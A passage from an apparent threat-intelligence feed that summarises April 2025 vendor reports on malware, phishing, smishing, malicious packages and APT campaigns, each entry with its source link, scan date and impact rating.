Summary:: Researchers at ASEC have identified a recent malware campaign distributing malicious LNK files disguised as official notices (e.g., tax bills, sex offender information) to target Korean users for information theft. Upon execution, the LNK file downloads and runs an HTA file, which extracts and executes embedded PowerShell scripts. These scripts perform extensive data collection, targeting browser data (including Naver Whale), cryptocurrency wallets, public certificates (GPKI/NPKI), email files, recent document paths, and implement keylogging and clipboard capturing capabilities. Persistence is established via the Run registry key, and stolen data is compressed and exfiltrated to attacker-controlled servers.

Source: https://asec.ahnlab.com/en/87620/

Intel Source:: Group-IB

Intel Name:: Where_Evasion_Drives_Phishing_Forward

Date of Scan:: 2025-04-27

Impact:: LOW

Summary:: Group-IB researchers have uncovered an ongoing, sophisticated SMS phishing (smishing) campaign impersonating a major toll road service provider, primarily targeting users in French-speaking Canada since late 2023. Cybercriminals distribute localized SMS messages, often leveraging misconfigured gateways or A2P platforms, urging victims to pay outstanding fees via links that lead to highly convincing fraudulent websites. These sites are designed to harvest both personal identifiable information (PII) and payment card details. The campaign employs advanced evasion techniques, including multi-layered URL redirection through legitimate services like Google AMP, and incorporates third-party JavaScript libraries such as FingerprintJS for browser fingerprinting to block analysis tools and restrict access only to targeted victims, and Cleave.js for real-time input validation.

Source: https://www.group-ib.com/blog/toll-of-deception/

Intel Source:: ASEC

Intel Name:: Kimsuky_Deploys_PebbleDash_via_LNK

Date of Scan:: 2025-04-27

Impact:: MEDIUM

Summary:: ASEC researchers have observed recent campaigns by the Kimsuky group distributing the PebbleDash backdoor, previously associated with Lazarus but now increasingly deployed by Kimsuky against individuals. Observed in March 2025, the attack initiates via spear-phishing emails containing malicious LNK files disguised with double extensions. Executing the LNK triggers a JavaScript file, which launches PowerShell scripts to establish persistence (task scheduler, registry keys) and communicate with C2 infrastructure (Dropbox, TCP sockets). Through this C2, Kimsuky deploys additional tools, including PebbleDash and AsyncRAT for remote control, UAC bypass malware (leveraging the AppInfo ALPC technique from UACMe), and a patched version of termsrv.dll to disable RDP license authentication, allowing unfettered RDP access.

Source: https://asec.ahnlab.com/en/87621/

Intel Source:: Symantec

Intel Name:: Billbug_Targeting_SouthAsian_Countries

Date of Scan:: 2025-04-26

Impact:: MEDIUM

Summary:: Researchers from Symantec have uncovered a campaign run by Chinese espionage group known as Billbug also referred as Lotus Blossom, Lotus Panda or Bronze Elgin. This group has emerged in 2009 and is targeting organisations such as government ministry, air traffic control agency, telecom operator and construction company within one country and news agency and an air freight company in neighbouring nations. The attackers abuse legitimate software from Trend Micro and Bitdefender to execute their malware through DLL sideloading. Additionally, they leverage known backdoor, Sagerunex, Zrok tool for remote access and deploy malware like ChromeKatz and CredentialKatz to steal passwords and cookies form Google crome.

Source: https://www.security.com/threat-intelligence/billbug-china-espionage

Intel Source:: Securelist

Intel Name:: Lazarus_Exploits_SK_Software

Date of Scan:: 2025-04-26

Impact:: LOW

Summary:: Researchers from Securelist have discovered a targeted effort by the Lazarus group called "Operation SyncHole," which impacted at least six South Korean firms in the software, IT, finance, semiconductor, and telecom industries. The group together watering hole attacks with exploiting vulnerabilities in local software, such as Cross EX and Innorix Agent.

Source: https://securelist.com/operation-synchole-watering-hole-attacks-by-lazarus/116326/

Intel Source:: JPCERT

Intel Name:: DslogdRAT_Deployed_via_Ivanti_Exploit

Date of Scan:: 2025-04-26

Impact:: LOW

Summary:: Researchers at JPCERT have identified the installation of DslogdRAT malware and a Perl-based web shell on Ivanti Connect Secure devices in December 2024, leveraging a zero-day vulnerability (CVE-2025-0282) in attacks against Japanese enterprises. The web shell, triggered by a certain cookie value, allowed attackers to run arbitrary commands, which were most likely used to deploy DslogdRAT. This malware employs a multi-process architecture, interacting with its C2 server and carrying out tasks such as file transfer, shell execution, and proxying using encoded socket communications.

Source: https://blogs.jpcert.or.jp/en/2025/04/dslogdrat.html

Intel Source:: Trend Micro

Intel Name:: North_Korea_Russia_Cybercrime_Nexus

Date of Scan:: 2025-04-26

Impact:: MEDIUM

Summary:: Researchers at Trend Micro have identified that North Korea's cybercrime operations, particularly those associated with the Void Dokkaebi intrusion suite, rely heavily on Russian infrastructure. They discovered various Russian IP address ranges, which are often hidden by VPNs, proxies, and VPS servers, and are regularly utilized by DPRK-aligned actors to execute cyber activities such as crypto wallet brute-forcing, fraudulent job scams, and command-and-control arrangements for Beavertail malware.

Source: https://www.trendmicro.com/en_us/research/25/d/russian-infrastructure-north-korean-cybercrime.html

Intel Source:: Intezer

Intel Name:: Emerging_Phishing_Techniques_and_Attack_Vectors

Date of Scan:: 2025-04-25

Impact:: MEDIUM

Summary:: Intezer researchers have identified several emerging phishing techniques observed in 2025 that successfully bypass traditional email security defenses. Threat actors are increasingly using unconventional methods, including embedding obfuscated, Base64-encoded JavaScript within SVG file attachments, hiding malicious URLs in PDF annotation metadata (invisible in the main text layer), leveraging read-only OneDrive links where malicious URLs are dynamically loaded via JavaScript at runtime, and nesting malicious MHT files containing QR codes within OpenXML (.docx) documents.

Source: https://intezer.com/blog/emerging-phishing-techniques-new-threats-and-attack-vectors/

Intel Source:: Cisco Talos

Intel Name:: LAGTOY_Backdoor_Enables_Ransomware

Date of Scan:: 2025-04-25

Impact:: LOW

Summary:: Researchers at Cisco Talos have found a financially motivated Initial Access Broker (IAB) known as "ToyMaker," who collaborates with double extortion gangs. Talos discovered ToyMaker using internet-exposed vulnerabilities to deliver a custom backdoor known as "LAGTOY," which facilitated credential theft, reverse shell creation, and command execution on infected endpoints in a 2023 inquire of a critical infrastructure company.

Source: https://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/

Intel Source:: Rixed Labs

Intel Name:: Malware_Campaign_Potentially_Linked_to_Konni_Group

Date of Scan:: 2025-04-25

Impact:: MEDIUM

Summary:: An active multi-stage malware campaign, exhibiting strong similarities to the North Korean-linked Konni APT group, was recently analyzed after being distributed via a ZIP archive containing a malicious LNK file. First seen in April 2025, the campaign uses social engineering, disguising the initial LNK file with a Korean filename ("Proposal") and PDF icon to target Korean-speaking users. Execution triggers a complex chain involving obfuscated PowerShell, VBScript, and multiple batch files, which extract payloads hidden within the LNK, establish persistence via the registry, collect directory listings and system information, and ultimately exfiltrate data using RC4-like encryption over HTTPS POST requests.

Source: https://muff-in.github.io/blog/Malware-Campaign-Potentially-Linked-to-DPRK-Konni-Group/

Intel Source:: ReliaQuest

Intel Name:: MSHTA_2FA_Bypass_on_the_Rise

Date of Scan:: 2025-04-24

Impact:: LOW

Summary:: ReliaQuest researchers have discovered an increase in financially driven cyberattacks between December 2024 and February 2025, including a large increase in VPN brute-forcing efforts, defense evasion via MSHTA exploitation, and internal phishing for lateral movement. Initial access attacks through VPNs, RDP, and VDI grew by 21.3%, with many leveraging weak or compromised credentials.

Source: https://www.reliaquest.com/blog/threat-spotlight-cyber-attacker-techniques-dec-2024-to-feb-2025/

Intel Source:: Trend Micro

Intel Name:: FOG_Ransomware_Linked_to_DOGE

Date of Scan:: 2025-04-24

Impact:: LOW

Summary:: Researchers at Trend Micro have identified that the FOG ransomware is actively circulated by attackers purporting to be affiliated with the Department of Government Efficiency. The threat actors are using phishing emails with ZIP files named "Pay Adjustment.zip," which include malicious LNK files that start the ransomware infection. Nine such samples, uploaded to VirusTotal between March 27 and April 2, exhibited characteristics of the FOG ransomware strain, including as binaries with a ".flocked" extension and ransom letters directing victims to spread the malware further.

Source: https://www.trendmicro.com/en_us/research/25/d/fog-ransomware-concealed-within-binary-loaders-linking-themselve.html

Intel Source:: ISC.SANS

Intel Name:: Phishing_via_Ad_Redirects

Date of Scan:: 2025-04-24

Impact:: LOW

Summary:: Researchers from ISC SANS have discovered that actively fraudulent advertising URLs continue to thrive in 2025, revealing ongoing flaws in ad platform security. The Internet Storm Center received a recent phishing email that inspired victims through a legal ad infrastructure to a well-known credential harvesting page located on a Dynamic DNS service. Despite obvious signs of fraudulent activity and many sightings of the same phishing effort over a week, the redirect remained active and unblocked.

Source: https://isc.sans.edu/diary/Its+2025+so+why+are+obviously+malicious+advertising+URLs+still+going+strong/31880/

Intel Source:: ASEC

Intel Name:: MS_SQL_Attacks_Using_Ammyy_Admin

Date of Scan:: 2025-04-23

Impact:: LOW

Summary:: Researchers at ASEC have identified attacks targeting poorly managed, publicly accessible MS-SQL servers to install the legitimate remote control tool, Ammyy Admin, for malicious use. Threat actors gain initial access, likely exploiting weak credentials, and execute reconnaissance commands before using wget to download Ammyy Admin (v3.10, an old version with known exploitation methods) alongside the PetitPotato privilege escalation tool. The attackers utilize PetitPotato to create a new user account and enable Remote Desktop Protocol (RDP) access, supplementing the remote control capability provided by Ammyy Admin.

Source: https://asec.ahnlab.com/en/87606/

Intel Source:: JFrog

Intel Name:: Malicious_PyPI_Package_Targets_MEXC

Date of Scan:: 2025-04-23

Impact:: LOW

Summary:: Researchers at JFrog have identified ccxt-mexc-futures, a malicious Python package on PyPI that mimics the legal and widely used CCXT library in order to steal cryptocurrency trading credentials. The package intends to offer functionality for MEXC futures trading, however it really hijacks API calls relating to order submission and cancellation and redirects them to a malicious server. This redirection allows attackers to harvest API keys and secrets, potentially compromising user accounts on the MEXC exchange.

Source: https://jfrog.com/blog/malicious-pypi-package-hijacks-mexc-orders-steals-crypto-tokens/

Intel Source:: G-Data

Intel Name:: Vidar_Stealer_Abuse_BFInfo_and_Gaming_Platforms

Date of Scan:: 2025-04-23

Impact:: LOW

Summary:: Researchers from G-Data have observed that Vidar stealer is being distributed through gaming platforms and the Microsoft tool BGInfo. Vidar Stealer is a malware that first emerged in 2018 and is known for stealing sensitive information like browser cookies, saved passwords, and financial data. It operates as MaaS and distributes via phishing emails and malvertising. Researchers identified an incident where a steam game called PirateFi contained Vidar Stealer that compromise users’s system upon installation. Another incident in which attackers leverage infected version of BGInfo where code has been modified to deploy malware when opened.

Source: https://www.gdatasoftware.com/blog/2025/04/38169-vidar-stealer

Intel Source:: Checkpoint

Intel Name:: Mastercard_Back_in_Phishing_List

Date of Scan:: 2025-04-23

Impact:: LOW

Summary:: Checkpoint researchers have discovered that phishing attempts in the first quarter of 2025 continue to primarily abuse trusted brand names, with Microsoft remaining the top targeted brand, accounting for 36% of all brand phishing activities. Google and Apple come in second and third place, with 12% and 8%, respectively. Notably, Mastercard has made a comeback to the list of top targeted brands for the first time since Q3 2023, now ranked fifth. In February, a massive phishing campaign targeting Mastercard customers appeared, especially affecting Japanese users via bogus websites that mimicked the official Mastercard portal in order to steal credit card information.

Source: https://blog.checkpoint.com/research/microsoft-dominates-as-top-target-for-imitation-mastercard-makes-a-comeback/

Intel Source:: Cofense

Intel Name:: Amazon_Gift_Card_Email_Hooks_Microsoft_Credentials

Date of Scan:: 2025-04-22

Impact:: LOW

Summary:: Researchers Cofense have identified a phishing campaign that deceives users into revealing their Microsoft login credentials by offering $200 Amazon e-gift card reward from their employer. The attackers send a phishing email that appear to be reward for excellent job performance from Reward Gateway. When victim click on the gift card link, they are taken to fraudulent gift card page where they are asked to enter the email which then redirect them to a deceptive Microsoft page where the attackers attempt to steal their credentials.

Source: https://cofense.com/blog/amazon-gift-card-email-hooks-microsoft-credentials

Intel Source:: cloudsek

Intel Name:: Malicious_PDF_Converter_Campaign

Date of Scan:: 2025-04-22

Impact:: LOW

Summary:: Researchers at CloudSEK have found a sophisticated malware operation that used a bogus PDF to DOCX converter platform. Following an FBI alert in March 2025, the investigation discovered that attackers impersonated a reputable file converting service to deceive users. Victims were tricked into running a PowerShell command, which resulted in the deployment of Arechclient2, an information stealer linked to the SectopRAT family.

Source: https://www.cloudsek.com/blog/byte-bandits-how-fake-pdf-converters-are-stealing-more-than-just-your-documents

Intel Source:: Palo Alto

Intel Name:: Multi_Layered_Malware_Delivery_Chain

Date of Scan:: 2025-04-21

Impact:: MEDIUM

Summary:: Researchers from Palo Alto Networks have discovered a complex phishing campaign that uses a multi-layered attack chain to distribute malware such as Agent Tesla versions, Remcos RAT, and XLoader. The campaign, which was first discovered in December 2024, includes fraudulent emails posing as order release requests, with malicious archives containing JavaScript Encoded files.

Source: https://unit42.paloaltonetworks.com/phishing-campaign-with-complex-attack-chain/

Intel Source:: Securelist

Intel Name:: IronHusky_Revives_MysterySnail_RAT

Date of Scan:: 2025-04-21

Impact:: LOW

Summary:: Securelist researchers have identified the Chinese-speaking threat actor IronHusky, active since at least 2017, has deployed new versions of its MysterySnail RAT against government organizations in Russia and Mongolia, regions the actor has previously targeted. This activity marks the first public reporting on the implant since its initial discovery in 2021, although analysis suggests it remained in active use undetected. Delivery occurs via malicious MMC scripts disguised as documents, which retrieve payloads and leverage DLL sideloading against legitimate executables like CiscoCollabHost.exe. An intermediary backdoor utilizes the open-source piping-server for C2 and employs anti-analysis techniques by storing API information in an external, encrypted file. This backdoor then deploys the final MysterySnail RAT, a modular implant using RC4/XOR encryption and DLL hollowing, which communicates over HTTP for extensive system control, including file management, command execution, and process manipulation.

Source: https://securelist.com/mysterysnail-new-version/116226/

Intel Source:: subline

Intel Name:: TROX_Stealer_Malware_Campaign

Date of Scan:: 2025-04-21

Impact:: LOW

Summary:: Sublime researchers have discovered a new Malware-as-a-Service (MaaS) campaign centered on a previously unknown information stealer known as TROX Stealer. TROX, discovered in December 2024, is intended to use urgency-based phishing lures, particularly those involving legal or debt-related implications, to deceive users into breaching security standards. The malware steals sensitive data from Discord and Telegram, including browser credentials, credit card information, cryptocurrency wallets, and session files.

Source: https://sublime.security/blog/trox-stealer-a-deep-dive-into-a-new-malware-as-a-service-maas-attack-campaign/

Intel Source:: Palo Alto

Intel Name:: Slow_Pisces_Targets_Developers_With_Coding_Challenges

Date of Scan:: 2025-04-20

Impact:: LOW

Summary:: Researchers from Palo Alto uncovered a campaign conducted by North Korean threat actor called Slow Pisces also known as Jade Sleet, TraderTraitor or PUKCHONG targeting large organizations in the cryptocurrency sector. In this campaign, the group impersonates recruiters from company to offer fake job opportunities to developers who are working in Crypto. The group send them a PDF which includes job details along with coding challenge. This coding challenge also includes github repository link which contains project related to stock prices, sports stats, weather, or crypto prices. Once developer runs the project, it downloads and executes malware named RN Loader and RN Stealer which are used to steal sensitive information and gain unauthorized access.

Source: https://unit42.paloaltonetworks.com/slow-pisces-new-custom-malware/

Intel Source:: Cyfirma

Intel Name:: The_Rising_of_Online_Investment_Scams

Date of Scan:: 2025-04-20

Impact:: LOW

Summary:: Cyrima researchers have observed the rising of online investment scams that exploit digital finance, stock trading and cryptocurrencies. These scams often disguised as money-doubling offers, fake investment schemes, fraudulent trading apps and Telegram-based schemes which always lure individuals with promises of guaranteed returns in a short time. They create fake companies, develop counterfeit mobile apps and run social media and messaging campaigns to entice people into depositing money. Once money is invested, victims are unable to recover it. Researchers also identified that scammer exploit UPI payment systems for fund transfers and compromise vulnerable Indian government and educational websites to promote their scams.

Source: https://www.cyfirma.com/research/scamonomics-the-dark-side-of-stock-crypto-investments-in-india/

Intel Source:: Huntress

Intel Name:: IAB_Activity_Behind_RDP_Attacks

Date of Scan:: 2025-04-20

Impact:: LOW

Summary:: Researchers from Huntress have discovered that what looked to be a regular brute force attack against an exposed Remote Desktop Protocol (RDP) service was actually part of a larger and more complicated effort, most likely linked to ransomware initial access brokers. Their investigation began when their SOC identified domain enumeration activity, which led to the discovery of a successful brute force attack against a single user account.

Source: https://www.huntress.com/blog/brute-force-or-something-more-ransomware-initial-access-brokers-exposed

Intel Source:: Reversinglabs

Intel Name:: Malicious_NPM_Packages_Hijack_Crypto_Wallet

Date of Scan:: 2025-04-19

Impact:: LOW

Summary:: ReversingLabs researchers have uncovered a campaign where threat actors are hijacking open-source software packages to target cryptocurrency users. They are uploading legitimate packages that apply malicious code to already installed software instead of changing them directly. The attackers leverage fake npm package called pdf-to-office that claim to convert PDF files to MS Office but actually search for crypto wallet apps like Atomic Wallet and Exodus and secretly change the some of their files. This allow the attacker to change the wallet address during a transaction that redirect the funds to their own wallet.

Source: https://www.reversinglabs.com/blog/atomic-and-exodus-crypto-wallets-targeted-in-malicious-npm-campaign

Intel Source:: Checkpoint

Intel Name:: Malspam_Exploits_NTLM_Vulnerability

Date of Scan:: 2025-04-18

Impact:: LOW

Summary:: Check Point researchers have discovered active exploitation of CVE-2025-24054, a Windows vulnerability that permits NTLM hash disclosure through spoofing with maliciously crafted.library-ms files. Despite Microsoft issuing a patch on March 11, 2025, threat actors began exploiting this flaw just days later, conducting malspam campaigns against institutions in Poland and Romania.

Source: https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/

Intel Source:: Cisco Talos

Intel Name:: XorDDoS_Evolves_in_Global_Linux_Attacks

Date of Scan:: 2025-04-18

Impact:: MEDIUM

Summary:: Cisco Talos researchers have tracked ongoing global activity linked to the XorDDoS malware from November 2023 through February 2025,, primarily targeting Linux machines, including Docker servers, to build distributed denial-of-service (DDoS) botnets. Operators, assessed with high confidence by Talos as Chinese-speaking based on tool artifacts, leverage SSH brute-force attacks to gain initial access, followed by script execution to install the malware and establish persistence via init and cron jobs. Analysis revealed a new "VIP version" of the XorDDoS sub-controller and a distinct central controller, tools likely developed as a commercial suite, enabling actors to manage multiple sub-controllers and orchestrate more sophisticated, widespread attacks.

Source: https://blog.talosintelligence.com/unmasking-the-new-xorddos-controller-and-infrastructure/

Intel Source:: Check Point

Intel Name:: APT29_Targets_EU_Diplomats_Again

Date of Scan:: 2025-04-18

Impact:: MEDIUM

Summary:: Check Point researchers have found a returned phishing campaign by APT29, a Russia-linked threat group that targets diplomatic entities around Europe. The campaign, which began in January 2025, impersonates a large European Ministry of Foreign Affairs and sends out fake invites to wine tasting events. The emails contain malicious links that launch a new initial-stage loader called GRAPELOADER, which is involved in fingerprinting, persistence, and payload delivery.

Source: https://research.checkpoint.com/2025/apt29-phishing-campaign/

Intel Source:: Dion Alexander (Medium)

Intel Name:: Lazarus_Linked_Malware_Targets_Windows

Date of Scan:: 2025-04-17

Impact:: MEDIUM

Summary:: Dion Alexander have analysed a malware sample exhibiting APT characteristics strongly associated with the Lazarus Group (APT38), a North Korean state-sponsored actor known for financially motivated cybercrime, espionage, and disruptive attacks. The malware, targeting Windows systems, employs multiple evasion and persistence techniques including packing or obfuscation, process injection, and registry modification for startup execution. Dynamic analysis revealed attempts to establish command and control (C2) communication via HTTP POST requests to a suspicious domain hosted in South Korea, although data exfiltration was not confirmed. Key behaviors align with established Lazarus TTPs, such as using native Windows APIs, command shell execution, and potentially modifying services or timestomping for defense evasion. While primarily targeting Windows, Lazarus' known expansion to Linux and macOS broadens the potential victim pool.

Source: https://medium.com/@InfoSecDion/unpacking-apt38-static-and-dynamic-analysis-of-lazarus-group-malware-d2828e0fd6f0

Intel Source:: Dark Atlas

Intel Name:: Global_Rise_of_Akira_Ransomware

Date of Scan:: 2025-04-16

Impact:: MEDIUM

Summary:: Researchers from Dark Atlas have discovered that the Akira ransomware group, which has been operating since at least March 2023, has rapidly expanded into a substantial cyber threat, hitting over 250 firms and obtaining approximately $42 million in ransom payments. Akira uses a double-extortion methodology that combines data encryption and exfiltration, threatening to disclose stolen information if victims fail to pay. Initial access is usually obtained by compromising VPN credentials and vulnerabilities in Cisco products, followed by lateral movement with programs such as AnyDesk, RClone, and WinSCP.

Source: https://darkatlas.io/blog/akira-ransomware-road-to-glory

Intel Source:: NVISO

Intel Name:: BRICKSTORM_Backdoor_Hits_Windows

Date of Scan:: 2025-04-16

Impact:: MEDIUM

Summary:: NVISO's researchers have analyzed the BRICKSTORM, a persistent espionage backdoor attributed to the China-nexus cluster UNC5221, now identified targeting Windows environments in addition to its previous Linux presence. Employed in long-running campaigns since at least 2022, BRICKSTORM facilitates intelligence gathering against European industries relevant to Chinese strategic interests, likely focusing on intellectual property and trade secret theft. The backdoor utilizes sophisticated command and control techniques, including DNS-over-HTTPS (DoH) for initial C2 resolution and a multi-layered TLS tunneling approach (up to three layers) over WebSockets, leveraging legitimate cloud providers like Cloudflare and Heroku as first-tier proxies to evade detection.

Source: https://blog.nviso.eu/wp-content/uploads/2025/04/NVISO-BRICKSTORM-Report.pdf

Intel Source:: Kandji

Intel Name:: Advanced_macOS_Spyware_PasivRobber

Date of Scan:: 2025-04-16

Impact:: LOW

Summary:: Kandji researchers, following the discovery of a suspicious file named 'wsus' on VirusTotal on March 13, 2025, uncovered PasivRobber, a sophisticated, multi-component macOS spyware suite. This threat appears specifically designed to target Chinese users, indicated by its focus on data exfiltration from applications popular in China, such as WeChat and QQ, alongside web browsers and email clients. The research suggests a potential link between PasivRobber and Xiamen Meiya Pico Information Co., Ltd., a Chinese company previously identified for developing surveillance and forensic tools. PasivRobber demonstrates advanced capabilities and a deep understanding of macOS internals, employing deceptive naming conventions (e.g., 'goed' mimicking 'geod', '.gz' extension for dylibs), persistence via LaunchDaemons, process injection using tools like 'apse' (similar to insert_dylib), and runtime key extraction from messaging apps using Frida. The suite communicates via RPC and FTP for updates and potential command execution, including remote uninstallation. The inherent stealth, comprehensive data harvesting scope, and sophisticated TTPs signify a high risk of extensive espionage and sensitive data compromise for targeted individuals and potentially organizations employing affected macOS systems.

Source: https://www.kandji.io/blog/pasivrobber

Intel Source:: Huntress

Intel Name:: Exploitation_of_Triofox_Servers

Date of Scan:: 2025-04-16

Impact:: LOW

Summary:: Researchers from Huntress have found active exploitation of a critical vulnerability CVE-2025-30406 influencing Gladinet CentreStack and Triofox servers, which has been included to CISA's Known Abused Vulnerabilities catalog. The flaw, evaluated 9.0 in severity, stems from hardcoded cryptographic keys in default setup files (web.config) that can be abused for remote code execution through ASP.NET ViewState deserialization.

Source: https://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild

Intel Source:: Trend Micro

Intel Name:: BPFDoor_Targets_Telecom_and_Finance

Date of Scan:: 2025-04-15

Impact:: LOW

Summary:: Trend Micro researchers have found a previously unknown controller tied to the BPFDoor malware employed by the APT group Red Menshen (also known as Earth Bluecrow), which allows attackers to open a reverse shell for further infiltration into affected networks. BPFDoor, a stealthy state-sponsored backdoor that uses Berkeley Packet Filtering (BPF), has been detected targeting the telecommunications, finance, and retail sectors in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt.

Source: https://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html

Intel Source:: ISC.SANS

Intel Name:: PyArmor_Obfuscated_Malicious_Python_Scripts

Date of Scan:: 2025-04-15

Impact:: LOW

Summary:: Researchers at ISC.SANS have observed malicious actors utilizing the legitimate PyArmor tool to obfuscate Python-based stealer malware, hindering detection and analysis. This multi-stage attack, reported in April 2025, begins with JavaScript executing PowerShell to download a zipped Python environment containing the obfuscated payload. This indicates that the malware is designed to steal credentials and cryptocurrency wallet data, using obfuscation techniques to evade static security measures. Additionally, it likely employs WMI queries for reconnaissance or to bypass sandboxes.

Source: https://isc.sans.edu/diary/Obfuscated+Malicious+Python+Scripts+with+PyArmor/31840/

Intel Source:: Cisco Talos

Intel Name:: Toll_Road_Smishing_Scam_in_the_US

Date of Scan:: 2025-04-15

Impact:: LOW

Summary:: Since October 2024, Cisco Talos researchers have identified a massive and ongoing SMS phishing (smishing) campaign aimed at toll road users in numerous US states. Financially motivated threat actors impersonate toll payment systems such as E-ZPass in order to steal personal and financial information from their victims. Victims receive SMS messages claiming a tiny unpaid toll cost, which prompts them to visit a fake domains specific to their state. These websites deceive users with bogus CAPTCHAs and false bills, eventually forcing them to enter sensitive information such as credit card numbers.

Source: https://blog.talosintelligence.com/unraveling-the-us-toll-road-smishing-scams/

Intel Source:: Morphisec

Intel Name:: ResolverRAT_Malware

Date of Scan:: 2025-04-15

Impact:: LOW

Summary:: Researchers at Morphisec have identified a new remote access trojan called ResolverRAT which is being used to target healthcare and pharmaceutical sectors. The attackers send phishing emails in local languages such as Hindi, Italian, Turkish, and others by using fear-inducing themes like legal trouble or copyright violations to trick users into downloading a malicious file. The malware uses DLL side loading technique to install the malware that runs the malware in memory. It employs on multiple persistence method by using the Windows Registry and the file system. ResolverRAT also uses certificate-based authentication, IP rotation, and certificate pinning to remain connected to its C2 servers.

Source: https://www.morphisec.com/blog/new-malware-variant-identified-resolverrat-enters-the-maze/

Intel Source:: Securelist

Intel Name:: GOFFEE_Targets_Russian_Entities

Date of Scan:: 2025-04-14

Impact:: LOW

Summary:: Securelist researchers have discovered that the threat actor GOFFEE continues to target Russian enterprises, namely in the media, telecommunications, construction, government, and energy sectors. Since 2022, GOFFEE has relied on spear phishing emails, originally employing modified Owowa modules and, by 2024, patched malicious instances of explorer.exe. In the second part of 2024, the group released a new PowerShell-based implant known as "PowerModul" and began replacing the PowerTaskel agent with a binary Mythic agent for lateral movement. GOFFEE further expanded its infection chains to include Word documents with malicious VBA macros and RAR packages with double-extension executables.

Source: https://securelist.com/goffee-apt-new-attacks/116139/

Intel Source:: BI.ZONE

Intel Name:: Sapphire_Werewolf_Targeting_Energy_Sector

Date of Scan:: 2025-04-14

Impact:: HIGH

Summary:: BI.ZONE researchers have uncovered that the Sapphire Werewolf threat cluster is actively targeting energy sector organizations using an enhanced version of the open-source Amethyst information stealer. Delivering through phishing emails disguised as HR-related memos containing malicious RAR archives, the stealer is executed via a .NET loader that runs a Base64-encoded payload directly in memory. To avoid sandbox detection, this updated variant features advanced anti-virtualization techniques—checking registry keys, WMI, hardware components, and services. It also uses Triple DES encryption to obfuscate configuration data. The attack primarily aims to steal credentials and exfiltrate sensitive data from various applications, including web browsers (Chrome, Opera, Yandex), Telegram, FileZilla, SSH clients, remote desktop tools, VPNs, and even documents stored on removable media.

Source: https://bi.zone/eng/expertise/blog/kamen-ogranennyy-sapphire-werewolf-ispolzuet-novuyu-versiyu-amethyst-stealer-dlya-atak-na-tek/

Intel Source:: Fortinet

Intel Name:: Malicious_NPM_Packages_Targeting_PayPal_Users

Date of Scan:: 2025-04-14

Impact:: LOW

Summary:: Fortinet researchers have uncovered a series of malicious NPM packages created by threat actor known as tommyboy_h1 and tommyboy_h2 to target PayPal users. The NPM packages are designed to steal sensitive information by disguising themselves with names like oauth2-paypal and buttonfactoryserv-paypal. Once packages are installed, it uses preinstall hook to run malicious scripts that sliently collect and exfiltrate system information such as usernames, hostnames and directory paths. The exfiltrated data is then obfuscated and sent to a remote server controlled by the attacker.

Source: https://www.fortinet.com/blog/threat-research/malicious-npm-packages-targeting-paypal-users

Intel Source:: Microsoft

Intel Name:: Exploitation_of_CLFS_Lead_to_Ransomware_Activity

Date of Scan:: 2025-04-13

Impact:: MEDIUM

Summary:: Microsoft researchers have discovered an actively exploited Vulnerability (CVE-2025-29824) in the Windows Common Log File System. The attackers leveraged this vulnerability to gain privileged access on compromised systems to take full control after initial access. They target IT and real estate companies in the U.S., a bank in Venezuela, a software company in Spain and a retail business in Saudi Arabia. The exploitation was attributed to Storm-2460 which deployed custom malware known as PipeMagic to exploit the vulnerability and deploy ransomware payloads.

Source: https://www.microsoft.com/en-us/security/blog/2025/04/08/exploitation-of-clfs-zero-day-leads-to-ransomware-activity/

Intel Source:: Malwarebytes

Intel Name:: QuickBooks_Phishing_via_Google_Ads

Date of Scan:: 2025-04-13

Impact:: LOW

Summary:: Researchers from Malwarebytes have discovered a phishing attempt that used Google Ads to target Intuit QuickBooks users during the US tax season. Threat actors are taking advantage of the April 15th tax deadline to attract victims by purchasing fake Google Ads that look like authentic QuickBooks links. These advertisements guide consumers to convincing fake login sites that harvest usernames, passwords, and one-time passcodes (OTPs).

Source: https://www.malwarebytes.com/blog/scams/2025/04/tax-deadline-threat-quickbooks-phishing-scam-exploits-google-ads

Intel Source:: Forcepoint

Intel Name:: Obfuscated_SVG_Redirect_Attacks

Date of Scan:: 2025-04-13

Impact:: LOW

Summary:: Scalable Vector Graphics (SVG) files are emerging as a new tactic for attackers to bypass spam and phishing detections. Unlike traditional image formats like JPEG or PNG, SVG files use XML, which allows for embedded JavaScript, making them a potential attack vector. Malicious SVG files employ two main tactics: inline attachments that display within email clients with call-to-action buttons redirecting to phishing sites, and standalone attachments that trigger automatic browser redirection, bypassing URL scanning protections. Recent phishing campaigns have used SVG files in themes like voice notes, printer scans, remittance advice, and bank transfer details.

Source: https://www.forcepoint.com/blog/x-labs/obfuscated-svg-files-redirect-victims

Intel Source:: Cofense

Intel Name:: Phishing_Campaign_Targeting_Music_Websites

Date of Scan:: 2025-04-12

Impact:: LOW

Summary:: Researchers from Cofense have uncovered a phishing campaign targeting Spotify users to steal their login credentials and credit card information. The attack starts with a phishing email that claims that the user’s payment has failed. When users click on the link, they lead user to a Linktree page. If users click the Update Payment Method button, they further redirect to a phishing website hosted on Microsoft’s Azure App Service to enter their Spotify credentials or reset their passwords. The information is secretly sent to a server controlled by the attackers. After capturing login details, The phishing site redirects users to another fraudulent page requesting credit card information which is also sent to their server for exploitation.

Source: https://cofense.com/blog/more-than-music-the-unseen-cybersecurity-threats-of-streaming-services

Intel Source:: CERT-UA

Intel Name:: UAC_0219_PowerShell_Espionage

Date of Scan:: 2025-04-12

Impact:: MEDIUM

Summary:: Researchers from CERT-UA have discovered a cyber espionage campaign known as UAC-0219, which targeted Ukraine's public administration and critical infrastructure. The attackers exploit compromised accounts to send phishing emails with links to public file-sharing services that contain VBScript-based loaders. These scripts use PowerShell commands to exfiltrate sensitive files using cURL, focused on document and image formats.

Source: https://cert.gov.ua/article/6282902

Intel Source:: DTI

Intel Name:: Coquettte_Using_Proton66_to_distribute_Malware

Date of Scan:: 2025-04-12

Impact:: LOW

